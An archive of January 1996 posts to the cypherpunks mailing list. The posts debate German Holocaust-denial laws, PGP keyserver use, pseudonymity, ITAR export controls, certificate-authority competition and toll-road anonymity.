> Much as the Third Reich took the view that anti-Nazi speech
> wasn't protected.  Your country hasn't changed its authoritarian
> perspective on freedom of personal expression.  All it has done
> is put a different set of publicly supported items on the
> official censorship list.
>
> Didn't the Germans learn anything from World War II?

Evidently not. It would be an honorable thing to help Germans (who may
well be a minotiry) break the laws that we consider to be unjust.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Tue, 30 Jan 1996 03:56:05 +0800
To: cypherpunks@toad.com
Subject: Here's how you put your key on the keyservers...
Message-ID: <2.2.32.19960129123934.006abc88@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I got a message in response to a request I made to someone for their public
key.  I wanted to check the signatures that they included with their posts
to cypherpunks, but their key was not on the keyservers.  The key they
included was completely unsigned, and when I use it to validate their
previous posts as well as the message they sent which included the key, the
signatures come back as bad, the contents of the file changed.  Names are
appropriately withheld (I hope).  As I understand the bcc: definition, only
I and the first smtp server this message hits should know who it's to.  I
don't know if anyone else reading this mailing list needs this info, but
just in case... here's my reply to the message.

At 10:03 PM 1/28/96 -0800, you wrote:
>Sorry, I'm a newbie to Internet, and also the Internet usage of PGP.  I just
>participated in a local keysigning meeting, so maybe my key will find its
>way to a server.

Don't worry about being a 'newbie'.  Everyone starts somewhere.  However,
your key will usually not 'find its way' to a server without you
specifically sending it.  The keyserver I usually use is accessed by sending
a mail message which fits the following format.  As far as I know, all the
keyservers use this format to add or update keys in their databases.  You
only have to send it to one keyserver, and it will propagate to all the
others.  I have indented the text so that no handlers decide to interpret it
as a new message.

- - To: pgp-public-keys@pgp.iastate.edu
- - Subject: ADD
- -
- - -----BEGIN PGP PUBLIC KEY BLOCK-----
- - Version: 2.6.2
- -
- - [key deleted to protect the innocent]
- -
- - -----END PGP PUBLIC KEY BLOCK-----

>I'm sorry to have to admit that I don't even know how to do this!  Newbie
>alert!

If you don't admit you don't know something, nobody will usually tell you
how to do it.  Also, you should sign your own key.  That will make it harder
to forge, I think.  The reasons were spelled out in a couple of the web
pages I read, but I've forgotten them.  It has something to do with either a
denial of service attack or a man in the middle attack, or both.  The
command to do this is:

pgp -ks 0xHEXKEYID

Honestly, I've only just begun to use pgp myself.  Also, you should add your
e-mail address to the user-id of your key.  The command to do so is: 

pgp -ke 0xHEXKEYID

You will be asked if you wish to add a user id to the key.  Say yes, and
give it your e-mail address.  What this does is it allows people who are
using pgp-enabled mailers to directly encrypt messages to you without
choosing your key manually.

The reason that I have not encrypted this message to you using the key you
provided is that when I extracted the key and re-checked your message, the
signature was no good.  I've found that (using eudora) I must turn off the
word wrap feature of my mailer to allow for good signed messages out.  Of
course, having said this, I'll probably not get a good signature on this
message.  Let me know if it signs ok.

Now, I have a question.  Which attack(s) is/are a person vulnerable to when
distributing an unsigned public key in the open?  Could this actually be a
complex man-in-the-middle attack?  Am I paranoid?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQy/ds1+l8EKBK5FAQER8Af/SE1lTj3zcpm3ildFGO75zjZiJByZQi+3
LAkYgcHyBmtvhCTvyYCP2aMF4RjayrR3OHB85XthIA4sPmU0NDCVZYv7riSPjslp
iBxUk92dO+BkP8nrTFgqCzR4qPqbOSmZxeovZI0PfQvbm99fG6Fc2kjhdKP7Aq+G
cw4r0vvJY8JbqAuXftgZgndL9iGR/+xjfrpl+EWL3xtWzpIRfwMS5KMsR1UOf1ZA
g9mlMEGLXy5KC/BwaupgTTwlSA/NOTv5mAY8+UWt9ydMWXBqNVt/yiGFsjg5UR1M
CaT2D23pLAnWZ8M7yrjMamadkn2iLBqq4nhBNOGYHfZrGcbm/mhmxQ==
=jGo3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 30 Jan 1996 08:24:30 +0800
To: cypherpunks@toad.com
Subject: Re: The Big Lie
In-Reply-To: <199601291158.TAA00437@ratbox.rattus.uwa.edu.au>
Message-ID: <ukugiD96w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au> writes:
>
> I was under the impression that you couldn't libel/slander a dead
> person. Mainly because libel/slander is a offence against reputation
> which dead people don't care much for, but also because once you go
> against this principle where in hell (no pun intended) do you draw the
> line.

Where it's convenient to the state. Reportedly in Germany you can easily
slander dead people, their estates, their descendants, and other members
of their ethnic group.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 30 Jan 1996 00:16:45 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <199601291553.HAA24185@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:04 AM 1/29/96 -0500, Declan B. McCullagh wrote:
>You're actually quoting from an inspired bit of trolling. See my recent
>message: "Ernst Zundel impersonator on Usenet"

Oops:  I guess I should read *all* my cypherpunks mail before I start
sending off stuff.




 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olmur@dwarf.bb.bawue.de (Olmur)
Date: Tue, 30 Jan 1996 05:19:33 +0800
To: lull@acm.org (John Lull)
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <2.2.32.19960128115634.00977b14@panix.com>
Message-ID: <m0tgnaN-0006FvC@dwarf>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "John" Lull <lull@acm.org> writes:

John> On Sun, 28 Jan 1996 21:41 +0100 (MET), Olmur wrote:
>> It's illegal in Germany to publish material denying the holocaust.
>> In the same moment this guy sent his book (?) per snail-mail from
>> Canada to Germany he commited a crime here in Germany.

John> How pray tell is a person in Canada supposed to know that?  I
John> (in the US) certainly had no idea Germany had such a law.

Not knowing a law doesn't mean that I'm not liable for breaking it.


John> Are you saying that, if I ran a bookstore, and accepted
John> international mail orders, I would have to screen every order to
John> ensure I did not ship something offensive to the German
John> government?

Denying the holocaust is not 'something offensive to the German
government' but something that hurts the feeling of the people whose
relatives were murdered by the Nazis.

Free speech ends where other people can reasonable claim that their
feelings are badly hurt.


John> And if I did fill such an order, and without ever having set
John> foot in Germany, I could be arrested on my next trip to Europe,
John> extradited to Germany, and imprisoned for doing something that
John> is constitutionally protected in the US?

Is it constitutionally protected in US to knowingly hurt other
people's feelings and to trample on graves?????


John> Alternatively, what if I were to post to usenet a message
John> denying the Holocaust, and one person in Germany retrieved that
John> message.  Would I then be subject to arrest and extradition to
John> Germany?

Interesting question.  I assume from a formal standpointyou were, but
practically it might not be possible to proof that you sent the
message.


John> Mike Duvos wrote in another message:

>> It is interesting to note that there is no specific law prohibiting
>> free speech for Holocaust Agnostics in Germany. The actual laws
>> under which such cases are prosecuted are libel laws, which have
>> been liberally interpreted to mean that one may not "libel"
>> deceased Jews as a class or their memory in the minds of their
>> surviving relatives.

John> If in fact this is merely a judicial interpretation of an
John> apparently unrelated law, it just plain ridiculous to expect
John> people in other countries to be aware of it.

Mike's information is old.  Meanwhile it's explicitely forbidden to
deny the holocaust.


John> If this is really what Germany wants, then it sounds like time
John> to totally cut Germany off from the internet, simply in self
John> preservation.  No one can reasonably be expected to research
John> even the clearly-written laws worldwide that might conceivably
John> apply in such cases, much less far-fetched judicial
John> interpretations of such laws.

As said above: the law is explicite.  When I trade with another
country of course I have to obey this country's laws.  I mean if I
visit US I have to obey US-law.  If I know it or not.  If you visit
Germany, you have to obey German law.  If you know it or not.  The
same is with trade.


John> Olmur continued:

>> I don't think it's astonishing that Denmark imprissoned this guy
>> and transported him to Germany.  It's a normal thing that one
>> country imprisons a criminal another country is searching and the
>> delivers him/her to the country in question.

John> I, on the other hand, find this QUITE astonishing.  His actions
John> were legal in both Canada and Denmark (probably everywhere in
John> the world except Germany), and he did nothing in Germany.

He imported illegal stuff into Germany.  If I import weapons to US
without a licence I might be imprisoned on my next visit there, too.


Due to our history publishing NAZI-propaganda is forbidden in Germany.
The big majority in Germany agrees with this view, that
NAZI-propaganda doesn't fall under 'free speech'. Some neo-NAZIs
publish their books in other countries and then illegally transfer
them to Germany.

BTW, many European countries forbid publishing NAZI-propaganda.  And
as far as I know Denmark plans to change their law, too.


John> Of course, I find the US actions in kidnapping people in other
John> countries quite indefensible also, but at least in those cases
John> the persons involved clearly knew they were violating at least
John> US law, and in most cases were violating their local laws as
John> well.

How do you know that they know?  How do you know that the guy in
question didn't know?


Olmur
- --
"If privacy is outlawed, only outlaws will have privacy" --- P. Zimmermann
      Please encipher your mail!  Contact me, if you need assistance.

finger -l mdeindl@eisbaer.bb.bawue.de for PGP-key
         Key-fingerprint: 51 EC A5 D2 13 93 8F 91  CB F7 6C C4 F8 B5 B6 7C


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMQxwqA9NARnYm1I1AQGEaQQAodckRyq428q6UyPwBRAc7cmhMzCtJdio
iFk7/MZG25C4IPVk//hNTpp5vCFggKkLSsl1yqKgz51pBeXvR2OqjDLqXstygfJE
tDNKSEgCbeSNATM5Tgb08ZorZLXU/NBwJjmNWDjBGjgemwJy7Y1ncRpD1XfxxrDp
ZI7B1WEaqTA=
=4Zta
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 29 Jan 1996 16:00:43 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199601261801.KAA07578@slack.lne.com>
Message-ID: <199601290724.IAA10178@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I'm glad this interesting conversation came up. I apologize for
writing this anonymously, but I don't want to do anything to associate
my nym with my conventional name. The very act of comparing the
actions of the two entities would endanger my anonymity.

I use a nym to talk publically about a certain topic that, while it is
legal and not really that embarassing, I would rather not have
associated with my conventional name. In particular, I don't want my
thoughts on this topic to be archived by my conventional name. So I
use a nym, and it basically works. I think a really determined person
could break my nym even today, but I don't think anyone will ever be
that determined and I'm not that worried about it.

ericm@lne.com (Eric Murray) writes:
>But I have some problems/questions about using a nym:
>1. reputation.

Yes, each nym (and your conventional name, which in some ways is just
another nym) has to have its own, independent reputation. I don't know
any way around this. The whole point of a nym is so the actions of
your nym don't affect the reputation of your conventional name.

You could tell trusted people about the association between your nym
and your conventional name, but you're compromising your nym in doing
that. You have to develop a threat model - how seriously do you want
to keep your anonymity?

>2. does it (a nym) really help?

A perfectly secure one does, by definition - if no one can ever
associate your nym with your conventional name, in particular if no
one knows that you have a nym, then there is no problem. The question
is, how close are we today to that perfection?  Getting lots of mail
from remailers currently looks supicious.

>But if my nym is investigated for some future crime (fuck Exon) and
>my nym isn't secure enough to protect my RealName, it will be a liability.

Yes. One thing to remember is that a response block associates an
email address with a public key for ever and all time. To be safer,
you need to not let mail from the nym go back to a private email box.

True anonymity is inconvenient.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 30 Jan 1996 20:32:32 +0800
To: olmur@dwarf.bb.bawue.de (Olmur)
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <2.2.32.19960128115634.00977b14@panix.com>
Message-ID: <9601291431.AA14542@alpha>
MIME-Version: 1.0
Content-Type: text/plain



olmur@dwarf.bb.bawue.de writes:
 > Free speech ends where other people can reasonable claim that their
 > feelings are badly hurt.

Ai yai yai.

No, in fact free speech ends when people roll over and give up.


______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Jan 1996 01:56:30 +0800
To: vznuri@netcom.com>
Subject: Re: more RANTING about NSA-friendly cpunks
Message-ID: <m0tgwxW-0008xQC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:58 PM 1/29/96 +0800, Bruce Murphy wrote:
>In message <199601282104.NAA10926@netcom3.netcom.com>, 
>  "Vladimir Z. Nuri" wrote:
>> 
>> >In message <199601262011.MAA17408@netcom16.netcom.com>, 
>> >  "Vladimir Z. Nuri" wrote:
>> >> 
>> >> has anyone *tried* just ignoring the ITAR wrt crypto and seeing what 
>> >> would happen? the gubbermint blindly thinks that cyberspace will 
>> >> inevitably bring the wrath of four horsemen of the infocalypse, but aren't
>{snip}
>> >
>> >Zimmerman.
>>
>{snip}
>> Zimmermann supports my contention, as I wrote in the post. NOTHING
>> happened to him. it is conceivable this same result could have
>> been arrived at (government drops investigation) if he never even 
>> hired a lawyer.
>> 
>> Zimmermann is a perfect example of what may be counterproductive
>> hysteria on *our* side, toward advancing crypto. if Zimmermann
>> cannot be prosecuted, and is not prosecuted, where are the ITAR "teeth"???
>> 
>
>Nod. You may have a point there...
>
>I'll tell you what, seeing as I *can't* export cryptostuff against
>ITAR, what say *you* do it. Lots of it. And if nothing happens to you,
>well and good.
>OTOH the cause needs a few martyrs.
>Packrat (BSc/BE;COSO;Wombat Admin)

Packrat, I agree with the (likely) implications of  your (tongue-in-cheek?)
commentary.  The fact that "nothing happened to Zimmermann" is scant hope to
us.  If ITAR is causing cryptosystems to not be built, merely due to FUD
(fear, uncertainty, and doubt) then it is actively harming us.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQz8y/qHVDBboB2dAQGmRwP/YJPpzwQ4pZU3QZcSNNzKSz2kOEml1a9x
nV8wWDj019NLrPE0u1sKhsSkDu8QYeaAtSr3NnSMTK+DlLkuV7SKyXg6k/Pk3uWL
xqEmWNCM8+rTXyP2FuflD3w+HCe0oCRt2AzmclzUwlalTP2gY2bfKeAAawCdubST
FKZFFdlWNG0=
=Is7T
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 29 Jan 1996 22:35:27 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: An Enigma - Wrapped In a Circle
In-Reply-To: <199601290505.AAA36182@osceola.gate.net>
Message-ID: <199601291403.JAA22297@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Ray writes:
> >What the hell is the cypherpunks relevance here, anyway? I mean, other
> >than trying to elicit a response from me, which you surely knew would
> >show up, was there any purpose to this? Why are crop circles important
> >to people worrying about cryptography and cryptography policy? What
> >possible linkage could there be?
> 
> Why Perry! I see your point! Any phenomenon that elicits articles
> with titles like "Ciphers in the Crops" could have nothing at all
> to do with cryptography...

And I read it and it seemed like crap to me that had no relevance to
this mailing list. Neither would discussions of how UFOs are reading
our minds and thus a great threat to privacy.

> I repeat: Go hump a tree.

Thank you for your witty and sophisticated repartee.

Plonk.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Clark <cardo@well.com>
Date: Tue, 30 Jan 1996 02:01:13 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: Decrypting the "MIG Group"
In-Reply-To: <Pine.BSD.3.91.960129031748.3039C-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.3.89.9601290915.A5155-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


Jim, thanks very much for that news item.  I will post it on the WELL.

   Richard Clark

On Mon, 29 Jan 1996, James M. Cobb wrote:

>  
>  
>   Friend, 
>  
>  
>             A 01 29 96 Electronic Telegraph newsstory 
>             ----------------------------------------- 
> 
>                Riddle of spooks in the White House 
>  
>                    BY AMBROSE EVANS-PRITCHARD 
>  
>                            reports: 
>   
>      Official logs kept by the US secret service...indicate that 
>      a top White House aide, Patsy Thomasson, met a team of secret 
>      service technicians at her office on the night of Mr Foster's 
>      death. 
>  
>  
>   Evans-Pritchard writes: 
>  
>      ...logs kept by Secret Service staff at the White House --pub- 
>      lished in Senate documents on the death of Mr Foster-- show that 
>      a so-called "MIG Group" was checked into offices occupied by 
>      Miss Thomasson and her boss, David Watkins...at 7.10 pm on July 
>      20, 1993. 
>   
>      Miss Thomasson was the only member of the White House staff log- 
>      ged into the office at the time.  She checked out at the same 
>      time as the "MIG Group" at 7.44 pm.... 
>  
>  
>   E-P inquired about MIG, but-- 
>  
>      The press spokesman for the Secret Service at first said that 
>      he had not heard of the acronym "MIG". 
>  
>      The next day he changed his account, saying that the "MIG Group" 
>      was a team of Secret Service technicians that had gone to Miss 
>      Thomasson's office that night to conduct a routine alarm check. 
>      He said he could not divulge what the acronym MIG stood for be- 
>      cause the unit was secret. 
>  
>  
>   However, 
>  
>      Intelligence sources have told The Sunday Telegraph that "MIG" 
>      stands for "military intelligence group".  MIG groups are typi- 
>      cally known as Technical Services Counter-Measure teams (TSCMs), 
>      highly classified units that handle high-tech counter-espionage. 
>      Their duties, for example, include sweeping for bugs at the 
>      White House. 
>  
>      Sources say that the high-tech counter-espionage staff at the 
>      White House are controlled and operated by the Federal Emergency 
>      Management Agency, known as FEMA.  This agency...has enormous 
>      power and can draw freely on the capabilities of the CIA, the 
>      FBI, and the Pentagon. 
>  
>  
>   E-P concludes: 
>  
>      ...[The logs] add to the growing weight of evidence that a tiny 
>      group at the White House was tipped off early about Foster's 
>      death, long before the official notification at 8.30 pm.  It 
>      would have provided a window of at least an hour to cover things 
>      up before anybody was alerted.
>    
>      If so, America is facing a White House scandal that is every bit 
>      as serious and nasty as Watergate. 
>  
>  
>   The Electronic Telegraph can be accessed at: 
>  
>                     http://www.telegraph.co.uk 
>  
>  
>   The newsstory is under World News.  Its online filename is wamby- 
>   27.html. 
>  
>  
>   Cordially, 
>  
>   Jim 
>  
>  
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Mon, 29 Jan 1996 22:49:33 +0800
To: cypherpunks@toad.com
Subject: Re: Downsizing the NSA
Message-ID: <2.2.32.19960129143028.00716210@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:18 PM 1/28/96 EST, Dr. Dimitri Vulis wrote:
>I went to a talk by Andy Koenig a few weeks ago and he claimed that even
>though AT&T is laying off people (and splitting) they're still hiring every
>internet/security person they could find.

I don't know if this is tacky or politically incorrect for this list (so
I'll keep it short), ...

Speaking for my security group, this is correct. Anyone interested is urged
to send me private e-mail.

                                        Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 29 Jan 1996 23:54:15 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape, CAs, and Verisign
In-Reply-To: <310C6C1D.5A0@netscape.com>
Message-ID: <199601291523.KAA03337@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jeff Weinstein wrote:
| > 
| > The problem is simple enough:  sites with certificates from one of the CAs
| > that are preconfigured in Netscape have a tremendous advantage over sites
| > with certs from other CAs, and it's expensive and difficult to get a cert
| > if you're running an alternative server like ApacheSSL.
[...]
| > Netscape needs to address the situation.  It's just not practical or
| > desireable for one company (Verisign) to have a stranglehold on
| > certificates.

	Its unfortunate that Jeff speaks only for himself when he
wrote the following.  I'd very much like to hear Netscape speaking as
Netscape announce that a policy for CAs is forthcoming.

Adam


|   I agree with what you are saying.  I very much want to see real competition
| in the certificate issuing business.  We are in the process of developing
| a set of criteria that CAs have to meet in order to be included in the
| "default" list of CAs that our products support.  The criteria focus
| on assuring support for our customers more than trying to specify a
| particular policy.  The criteria will include things like required
| minimum response times for customer problems, compliance with an
| interoperability spec, publishing of policies, etc.  Some time in
| the next few months these criteria will be made public, and that 
| should allow for open competition.

      [much elided]
| -- 
| Jeff Weinstein - Electronic Munitions Specialist
| Any opinions expressed above are mine.



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 31 Jan 1996 07:04:53 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: The Big Lie
In-Reply-To: <2.2.32.19960128235423.0039a63c@vertexgroup.com>
Message-ID: <Pine.ULT.3.91.960129105341.6235E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jan 1996, John F. Fricker wrote:

> Rewriting history is a powerful tool, whether it be the history of the
> death of Hendrix, the death of Kennedy, the logging of the pacific
> northwest or of ethnic cleansing. 

It is a tool that can and should be countered. Which has some crypto 
relevance.

> The only way to combat the powerful who would seek to rewrite history 
> is to create an authenticatable system for document storage. Text books 
> have long been regarded as the predominant model yet, pick up any high 
> school history book and marvel at the differences from say Zinn's "The 
> People's History of the United States". What is needed is more though. A 

Actually, Zinn's book was the textbook for AP US History in my public high
school. Of course the teacher in question, an avowed socialist, has always
been controversial, and my parents urged me not to take AP US History for
that reason. 

> system whereby one can trace the source of the information to the actual 
> time and place of an event as well as authenticating identity.

Very much agreed. What we need is an offshore data haven to archive every
public lie spoken by these folks. 

I've heard back from Zundel, and I will be mirroring his site, partly for
the reasons above. The people who run Nizkor are very much in favor of the
mirror, and plan to link to it. The Wiesenthal Center has no comment.
Nizkor and the Wiesenthal Center tend not to comment on each other,
either. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jan 1996 02:09:40 +0800
To: cypherpunks@toad.com
Subject: "Radio Free Cyberspace" and the "Silicon Curtain"
Message-ID: <ad32475326021004c36b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:25 PM 1/29/96, Dr. Dimitri Vulis wrote:

>So, develop the tools to make the (illegal) flow of information easier and
>the prosecution more difficult. E.g., the former Soviet Union couldn't stop
>its people from listening to Western propaganda on short-wave radio,
>although it was illegal, and more repressive governments did confiscate all
>short-wave radios in the past.

If I were a PR sort of person, and interested in funding a "liberation
channel" into the countries behind the "Silicon Curtain," I'd think about a
catchy name for the program.

Not radio, of course, just a nod to the olden days of "Radio Free Europe"
and "Voice of America" (which was, unfortunately, partly staffed by former
members of the Mobile Killing Squads which rounded up Russian Jews).

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Tue, 30 Jan 1996 01:00:56 +0800
To: cypherpunks@toad.com
Subject: Slip over non-slip ports
Message-ID: <9601291630.AA28754@all.net>
MIME-Version: 1.0
Content-Type: text


(please respond directly to fc@all.net and not to the list)

I am looking for a way to run slip over a telnet connection on a local
Ethernet.  Does anyone know of any freely available software that allows
me to start a SLIP connection over a telnet channel?

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an253362@anon.penet.fi (Hell's Angel)
Date: Mon, 29 Jan 1996 20:04:31 +0800
To: cypherpunks@toad.com
Subject: pub key
Message-ID: <9601291136.AB06997@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Hi all!

Interested in discussing underground matters of cypherpunks.

Send your pgp pub key for more privacy.

FYI, my pub key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAzCao3cAAAEEANtplwCQqBOzXFfnHqUj6DCUfxhGPNH4J5/GadrqHjxSboDd
E0PEaXqg3JvAxMckmvasugDSK80rzEwgYJspeVuh6Cuq2fLhcFwGi1zn2mDrDlzO
0rQB8+CPj3dc03Eih9h8UvMcPl41VDwdtSV7CYXa5isMqw1fwh4YWpiTx+FtAAUR
tAxIZWxsJ3MgQW5nZWyJAJUDBRAw8rfgHhhamJPH4W0BAdezA/9hu5OUg6hiEuJ4
CU2cPdeoesTt8IfyGmAI7QCe5fXnGuNFTDjdlzS7FBUUE13ci5RNBUUs+jUNHeWp
ubyNBT0jvZUsTOBsrftrBxCW9PpeqZCXXSpxFx8XOgjdAQmf7a9bAKvq0IWx5/19
0NozRdmy61sBGMzFMNuSayLS3qR7kbQfQW5nZWxvIDxhbjI1MzM2MkBhbm9uLnBl
bmV0LmZpPg==
=Wv6H
-----END PGP PUBLIC KEY BLOCK-----

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 30 Jan 1996 01:33:59 +0800
To: cypherpunks@toad.com
Subject: The Politics of Mistrust 2
Message-ID: <199601291707.MAA18495@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Thanks to Replay, The Washington Post series on "The
   Politics of Mistrust" simmers at:

      http://www.replay.com/young/

   Today's second article of six is, "Who's in Control? Many
   Don't Know or Care."

      Politics is "a waste of my time. They're cutting each
      other down, just playing childish games. It's confusing
      nonsense, like two little kids on a schoolyard," says
      Temera Porter, a computer chip inspector in Beaverton,
      Oregon. "When I voted last I wrote in that George Carlin
      should be president, I really did."

   A sidekick report tells of Rush's 20m dittoheads' wishes to
   rid DC of George Carlin's Who's, fuck, shit ...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Mon, 29 Jan 1996 20:35:33 +0800
To: cypherpunks@toad.com
Subject: Re: TollRoad (CA 91) and anonymity (fwd)
In-Reply-To: <199601281520.QAA04604@utopia.hacktic.nl>
Message-ID: <Pine.HPP.3.91.960129110940.6095A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


<Questions to and answers from the CA91 administrators:>

> ................and have cash options for those customers who aren't
> comfy with recurring automatic transactions on their card or account.

This seems to be a new-speak definition of cash: that they send
you a bill instead of making an automatic withdrawal?

> We have an anonymous account option.

Great. I wonder how many of their customers take advantage of this
option, and how it works. The emitting chip is stated not to contain
any information other than 'ID so-and-so passes point X now'. Does one
have to keep track of one's credit status and go to an office and pay
with paper bills in advance? Not very convenient.

> Our records are much like those kept by the phone company -- they're sealed
> to the public and to official requests that aren't accompanied by a court
> order.

Ah, the records are GAKed. For convenience, the PD could as well
tap into the system in real-time. They have always thousands of
stolen vehicles to watch out for. 

> We don't ever purge our records.

What would be the reason for this? When a customer has paid his
bill, the detailed records have no consequences for their profit.
For long-term highway traffic analysis they could as well create
deidentified entries.

Stockholm is to get the first toll system ever in Sweden, in
a few years (for crossing into the inner city). From what has
come out so far, they are contemplating the use of Chaum's
anonymous toll system (alledgedly in place in Dutch cities).

How does this system work, cryptographically? (I haven't
found anything on Digicash's web site.)


Asgaard








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 30 Jan 1996 06:19:07 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: more RANTING about NSA-friendly cpunks
In-Reply-To: <m0tgwxW-0008xQC@pacifier.com>
Message-ID: <199601292041.MAA02734@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell:

>Packrat, I agree with the (likely) implications of  your (tongue-in-cheek?)
>commentary.  The fact that "nothing happened to Zimmermann" is scant hope to
>us.  If ITAR is causing cryptosystems to not be built, merely due to FUD
>(fear, uncertainty, and doubt) then it is actively harming us.

no, your own fear is harming you. no law requires that you be in fear
of it (some may try, but that is not a law that can be written). 
that is the point of the law, that is the intent of it. 

when you choose to be in fear of it, the bureacrats win. no one is forcing 
you to be in fear of it. that is YOUR CHOICE. even if you are thrown in
prison for it, or put in front of a firing squad for it,
you are still not required to fear the law.

the antidote to fear of a law is not necessarily to get rid of the law.
it is to STOP FEARING THE LAW. the avoidance of fear of the law will
lead to the ridding of it. don't you see that it is your FEAR OF THE
LAW, not necessarily the LAW ITSELF, that is the problem? the entire
ITAR could be revoked, but fraidy-cat cpunks could still have endless
theories about what the NSA Bogeyman would do to you if you actually
tried to write some crypto and export it.

===

I had a feeling someone would pretty soon say, "well, why don't YOU
violate the ITAR and we'll see what happens". this is the eternal cry and
whine of the sheep. "if I shouldn't fear something, why don't you
do it first, and then I'll see what happens to you. if something
happens to you, then I am justified in my fear". a lie-- it's just more 
sheep-fear. the sheep may continue to fear the law even if so-and-so
